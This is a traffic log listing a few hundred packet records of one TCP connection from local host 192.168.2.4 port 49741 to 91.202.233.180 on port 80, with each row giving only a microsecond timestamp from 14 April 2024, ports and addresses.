Apr 14, 2024 08:45:42.074548006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074572086 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074595928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074619055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074640989 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074664116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074683905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074707031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074728012 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074748039 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074769974 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074796915 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074817896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074837923 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074860096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074882030 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074901104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074924946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074949026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074970007 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074990988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075015068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075036049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075062037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075078964 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075103998 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075124025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075149059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075167894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075191975 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075203896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075232983 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075253963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075273991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075299025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075320005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075344086 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075366974 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075381994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075409889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075432062 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075452089 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075472116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075495958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075510025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075535059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075561047 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075583935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075603962 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075628996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075649977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075674057 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075694084 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075717926 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075737953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075759888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075778961 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.075817108 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076000929 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076026917 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076055050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076081991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076105118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076128006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076147079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076169968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076184034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076208115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076236963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076246023 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076268911 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076287985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076299906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076325893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076343060 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076364040 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076383114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076406002 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076446056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076479912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076503038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076520920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076540947 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076562881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076575994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076601028 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076618910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076641083 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076663017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076673985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076698065 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076719046 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076745987 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076766968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076786041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076807022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076827049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076848030 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076864004 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076885939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076905012 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076925039 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076946020 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076960087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.076988935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077003002 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077028990 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077050924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077069998 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077089071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077109098 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077126026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077150106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077163935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077188969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077203035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077224970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077244997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077260017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077284098 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077306032 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077320099 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077342987 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077364922 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077382088 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077404022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077419996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077444077 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077455997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077480078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077497959 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077517986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077532053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077554941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077577114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077599049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077620029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077634096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077656031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077682018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077696085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077723026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077749014 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077761889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077785015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077805042 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077826023 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077843904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077856064 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077878952 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077899933 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077920914 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077941895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077960968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.077975035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078000069 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078017950 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078038931 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078059912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078075886 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078098059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078116894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078140974 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078156948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078183889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078198910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078212976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078233957 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078254938 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078278065 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078295946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078315020 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078336954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078351974 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078373909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078396082 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078416109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078433037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078454971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078474998 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078495026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078516006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078536034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078552961 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078577995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078598022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078618050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078634977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078655005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078675985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078696966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078707933 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078733921 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078748941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078771114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078792095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078810930 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078831911 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078854084 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078872919 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078896999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078915119 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078932047 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078950882 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078969955 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.078988075 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079009056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079034090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079046965 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079067945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079090118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079111099 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079134941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079149008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079174995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079195976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079210043 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079233885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079252958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079271078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079291105 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079307079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079332113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079344034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079370022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079390049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079411983 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079432964 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079447031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079471111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079495907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079509020 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079535007 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079554081 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079576015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079603910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079617023 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079644918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079665899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079687119 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079711914 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079734087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079756021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079772949 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079796076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079818010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079838991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079859018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079879999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079900980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079922915 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079946041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079966068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.079982996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080010891 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080034971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080056906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080075979 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080101013 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080118895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080142021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080159903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080184937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080204964 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080234051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080245972 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080271006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080291033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080315113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080344915 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080358982 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080382109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080406904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080426931 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080446959 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080467939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080491066 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080506086 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080529928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080550909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080574036 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080590963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080617905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080635071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080662966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080686092 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080708981 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080729961 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080749989 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080770016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080794096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080816031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080837011 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080857992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080879927 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080900908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080923080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080955029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.080979109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081001997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081024885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081044912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081068993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081085920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081110954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081135035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081151962 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081176996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081195116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081218004 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081245899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081262112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081295967 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081309080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081332922 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081357002 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081377029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081398010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081423044 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081437111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081460953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081484079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081509113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081521988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081547022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081571102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081595898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081621885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081635952 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081664085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081687927 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081703901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081727982 CEST	49741	80	192.168.2.4	91.202.233.180
